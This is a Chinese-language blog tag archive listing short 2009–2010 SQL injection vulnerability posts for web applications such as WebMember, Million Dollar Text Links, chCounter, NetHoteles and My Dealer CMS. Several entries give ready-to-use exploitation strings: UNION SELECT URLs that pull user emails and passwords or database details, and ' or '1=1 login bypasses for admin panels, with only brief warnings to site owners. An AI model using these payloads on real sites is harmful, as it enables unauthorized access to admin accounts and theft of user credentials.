存档

文章标签 ‘注入’

Swoopo Clone 2010 SQL注入漏洞

2010年6月28日 spookzang 1 条评论

Swoopo Clone是一款收费的拍卖PHP程序,而这回却出现了0DAY,而且是不应该有的SQL注入漏洞,至笔者发布时候,官方还没有对漏洞进行修复。

分类: 脚本相关 标签: , , ,

风讯网站管理系统存在SQL漏洞

2010年6月26日 spookzang 没有评论

FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

这次出现了SQL注入漏洞,这个漏洞导致HACK能轻而易举的拿下用风讯搭建的网站。请各位站长注意!

影响版本:FooSun > 5.0

分类: 脚本相关 标签: , , ,

WebMember SQL注入漏洞

2009年6月3日 spookzang 2 条评论

利用方法: http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user–

分类: 脚本相关 标签: ,

Million Dollar Text Links SQL注入漏洞

2009年6月1日 spookzang 评论已被关闭

利用方法: http://www.[SpookZanG].net/demo/million/admin.link.modify.php?id=-6%20UNION%20SELECT%201,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9–

分类: 脚本相关 标签: ,

PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞

2009年5月9日 spookzang 1 条评论

影响版本:PJBlog 3.0.6.170,程序介绍:PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。

分类: 脚本相关 标签: , , , ,

chCounter 3.1.3的SQL注入漏洞!

2009年4月22日 spookzang 没有评论

前提:magic quotes = off 来到登录页面 http://[SpookZanG]//counter/stats/index.php 用户名与密码都输入: or ‘=’ 即可。

分类: 脚本相关 标签: , , ,

NetHoteles 2.0/3.0 存在注入漏洞

2009年4月21日 spookzang 没有评论

来到后台: http://www.[spookzang].net/superadmin (默认) 用户名和密码分别输入:’ or ’1=1 即可登入。

分类: 脚本相关 标签: , , ,

Online Guestbook存在SQL注入漏洞

2009年4月20日 spookzang 没有评论

利用方法 http://www.[SpookZanG].Net/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5

分类: 脚本相关 标签: , , ,

My Dealer Cms 2.0存在SQL注入漏洞!

2009年4月14日 spookzang 没有评论

来到登入点:(默认) http://[SpookZanG]/demo/admin/ 用户名和密码输入: ‘ or ’1=1 即可。

分类: 脚本相关 标签: , , ,

phpcms2008 ask的0DAY

2009年3月20日 spookzang 没有评论

受影响程序: phpcms2008 gbk,漏洞文件:ask/search_ajax.php

分类: 脚本相关 标签: , , , , ,